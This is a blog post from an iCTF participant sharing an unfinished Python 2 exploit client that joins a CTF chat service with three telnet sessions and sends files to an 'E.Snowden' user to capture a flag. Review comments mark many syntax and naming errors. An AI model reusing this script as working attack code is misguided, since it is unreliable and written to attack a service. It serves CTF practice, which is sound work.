Hi,

As last year, I was part of Team local maximum in the yearly iCTF. For this service, one of my fellow hackers had already figured out what one was supposed to do and gave me the information I needed to write a quick exploit. Unfortunately, time ran out before I finished the exploit.

Nevertheless, the agent-server communication was already finished, but I had not yet implemented a good algorithm to work out who should send which file. For a better write-up, see Andrew Dutcher.

So here is my incomplete exploit:

# Unfinished client for the CTF service: it joins one chat room with three
# "agent" connections, lists the files each agent holds and tries to send
# them to the "E.Snowden" user until a reply that may contain the flag arrives.
# NOTE(review): as posted this does not parse (see the notes on the `if` in
# clear_buffer_after_join, on send_file and on execute); it is Python 2 era
# code (print statement in a comment, integer `/`, str passed to telnetlib).
class Exploit():
    # One telnet session to the service, i.e. one participant in the room.
    class agent:
        # Connect, pick menu entry "1", join room `flag_id` and remember the
        # agent number the server assigned to this connection.
        def __init__(self, ip, port, flag_id):
            import telnetlib
            self.con = telnetlib.Telnet()
            # 20 is the connect timeout in seconds.
            self.con.open(ip, port, 20)
            # The read_until calls below pass no timeout, so they block until
            # the expected text arrives or the peer closes the connection.
            self.con.read_until("Get target room value")
            self.con.write("1\n")
            #print self.con.read_until("sadsad", timeout = 4)
            self.con.read_until("Enter your room id:")
            self.con.write(str(flag_id) + "\n")
            agent_name = self.con.read_until("has joined #" + str(flag_id))
            # Last character of the fourth-from-last space-separated token of
            # the join message; this is a one-character string, not an int.
            self.number = agent_name.split(" ")[-4][-1]

        # Drain the welcome text that follows the join message.
        def clear_buffer_after_join(self):
            self.con.read_until("* -- | Ask for help to get familiar around here", timeout = 10)
            # NOTE(review): this `if` has no indented body, which is a syntax
            # error; presumably the two lines below belong to it. Also,
            # self.number is a str, so `== 0` can never be true.
            if self.number == 0:
            # NOTE(review): no trailing "\n" here, unlike every other write,
            # and "E. Snowden" is spelled "E.Snowden" elsewhere - confirm.
            self.con.write("/msg E. Snowden")
            self.con.read_until("E.Snowden | I'll need to here this from all of you before I consider your submission.", timeout = 10)

        # Ask the server for this agent's file list and parse it by position
        # into self.bandwidth, self.names, self.size and self.sec.
        def get_list(self):
            self.con.write("/list\n")
            # "sadasdsD" looks like a sentinel that is never expected to match,
            # so this returns whatever arrived within the 3 second timeout.
            string = self.con.read_until("sadasdsD", timeout = 3)
            split = string.split()
            # NOTE(review): kept as a string; send_file later subtracts an int
            # from it and execute compares it with an int.
            self.bandwidth = split[6]
            self.names = []
            self.size = []
            self.sec = []
            # Assumes 14 leading tokens followed by 6 tokens per file; the
            # layout comes from the remote peer and is not validated, so a
            # different reply raises IndexError or ValueError.
            # Relies on Python 2 integer division for the range() argument.
            for i in range((len(split) - 14)/6):
                self.names.append(split[i*6 + 3 + 14])
                # Drops the last two characters before int() - presumably a
                # unit suffix; confirm against real server output.
                self.size.append(int(split[i*6 + 4 + 14][:-2]))
                self.sec.append(split[i*6 + 5 + 14])

        # Send file `index` to recipient `rec`; return the text that follows
        # the "your boss will want this:" marker, or "" if it did not appear.
        def send_file(self, index, rec):
            self.bandwidth -= self.size[index]
            # NOTE(review): unbalanced "]" (syntax error) and `self.name` is
            # never assigned; get_list fills `self.names`.
            self.con.write("/send " + rec + " " + self.name[index]] + "\n")
            # NOTE(review): agent defines no read_until / read_all; presumably
            # self.con.read_until and self.con.read_all are meant. read_all
            # blocks until the peer closes the connection.
            tmp = self.read_until("End -- | way. I think your boss will want this:", timeout = 3)
            if tmp.endswith("this:"):
                return self.read_all()
            else:
                return ""

    # Open three agent sessions in room `flag_id`, list their files and send
    # files to "E.Snowden", preferring the highest sec/size ratio, until a
    # non-empty reply is stored in self.flag.
    def execute(self, ip, port, flag_id):
        agents = [self.agent(ip, port, flag_id) for i in range(3)]
        for agent in agents:
            agent.clear_buffer_after_join()
        # NOTE(review): iterates `agent`, not `agents`.
        for agent in agent:
            agent.get_list()
        #bad optimization but hey!
        for agent in agents:
            # NOTE(review): `=!` is not an operator (`!=` intended) and the
            # attribute filled by get_list is `names`, not `name`.
            while len(agent.name) =! 0:
                fac = 0
                num = 0
                # NOTE(review): `a0` is never defined; presumably the loop
                # variable `agent` is meant throughout this loop.
                for i in range(len(a0.names)):
                    # NOTE(review): the trailing ":" is a syntax error.
                    tmp = float(a0.sec[i]) / a0.size[i]:
                    if fac < tmp:
                        num = i
                        fac = tmp
                    # NOTE(review): at this indentation the drop-or-send step
                    # runs on every pass of the inner loop, before the best
                    # ratio is known; presumably it belongs after the loop.
                    # A file that fits but yields "" is never removed, so the
                    # while loop would not end in that case.
                    if a0.size[num] > a0.bandwidth:
                        a0.size.pop(num)
                        a0.name.pop(num)
                        a0.sec.pop(num)
                    else:
                        pos_flag = a0.send_file(num, "E.Snowden")
                        if pos_flag =! "":
                            self.flag = pos_flag
                            return
    # Return the captured flag as a dict under the key 'FLAG'.
    # self.flag is only assigned on success in execute, so calling this after
    # an unsuccessful run raises AttributeError.
    def result(self):
            return {'FLAG' : self.flag }

if __name__ == "__main__":
    # Script entry point: one run against the hard-coded service address,
    # using room / flag id 4. The port is passed as a string.
    target_ip, target_port, room_id = "10.14.42.2", "13007", 4
    e = Exploit()
    e.execute(target_ip, target_port, room_id)
